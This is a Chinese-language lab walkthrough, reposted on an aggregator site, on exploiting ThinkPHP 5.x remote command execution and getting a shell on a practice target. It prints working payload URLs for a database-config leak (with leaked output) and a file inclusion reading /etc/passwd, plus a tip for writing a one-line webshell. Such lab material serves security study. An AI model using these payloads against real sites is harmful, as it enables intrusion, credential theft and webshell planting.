欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 文旅 > 八卦 > 常见框架漏洞攻略-ThinkPHP篇

常见框架漏洞攻略-ThinkPHP篇

2025/3/28 8:10:35 来源:https://blog.csdn.net/m0_66808441/article/details/146489750  浏览:    关键词:常见框架漏洞攻略-ThinkPHP篇
漏洞名称:Thinkphp5x远程命令执行及getshell
第一步:开启靶场

第二步:准备工具

第三步:启动工具,进行漏洞检测

#存在漏洞
1.目标存在tp5_invoke_func_code_exec_1漏洞2.目标存在tp5_dbinfo_leak漏洞payload:http://47.103.81.25:8080?s=index/think\config/get&name=database.hostnamehostname: 127.0.0.1, hostport: , database: , username: , password: root3.目标存在tp5_file_include漏洞payload: http://47.103.81.25:8080?s=index/\think\Lang/load&file=/etc/passwd
第四步:选择相应poc,执行tp5_invoke_func_code_exec_1漏洞

第五步:查看tp5_file_include漏洞

第六步:尝试GetShell

注意:

如果采取手工注入需注意:写一句话木马时如果是在双引号中,特殊字符$_GET会被转义而导致无法执行,如果非要使用双引号的话,需要在前添加转义字符

                                                                                                                        FROM  IYU_

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词